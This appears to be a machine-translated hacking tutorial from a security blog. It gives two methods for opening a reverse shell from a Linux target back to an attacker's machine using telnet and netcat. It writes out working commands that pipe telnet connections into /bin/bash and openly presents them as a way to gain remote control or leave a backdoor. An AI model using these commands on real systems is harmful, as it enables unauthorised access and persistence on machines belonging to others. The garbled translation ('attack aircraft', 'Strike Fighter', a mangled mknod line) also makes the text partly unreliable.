Author: buns love
Article Source: Black and White Road
Today to introduce two methods telnet shell of a rebound, rebound shell relative to other ways to simply, as demand remote control or use the back door to stay, hope to help everyone.
Prerequisite: The target for the linux system and supports telnet service; supports telnet service attack aircraft, attack aircraft equipped with NC (windows, linux available).
Here I prepared a public network server and a local virtual machine, the public network server attack machine, the virtual machine to the target machine.
The first 0x01
1. The first attack aircraft to perform monitor: nc -l 2222
2. target machine execution: mknod ap; telnet xxxx 2222 0 <a | /bin/bash 1> a (xxxx is the attack machine ip)
3. Strike Fighter has received shell (no prompt), try to execute the command:
The second 0x02
1. attack aircraft needs to open two terminals are listening two ports: nc -l 6666, nc -l 5555
2. target machine execution: telnet xxxx 6666 | / bin / bash | telnet xxxx 5555 (xxxx is the attack machine ip)
3. The target machine has received shell, try to execute the command (the first terminal to execute the command will be echoed at the second terminal):
That's two ways to use telnet rebound shell, of course, not only these two, the Internet can find all kinds of other ways to rebound, but the principles are similar.
The demonstration system uses two are centos7, and almost initialization system demonstration is a screenshot of this effect. Depending on the operating system, some systems get to the shell or be the target machine telnet connection there will be echoed.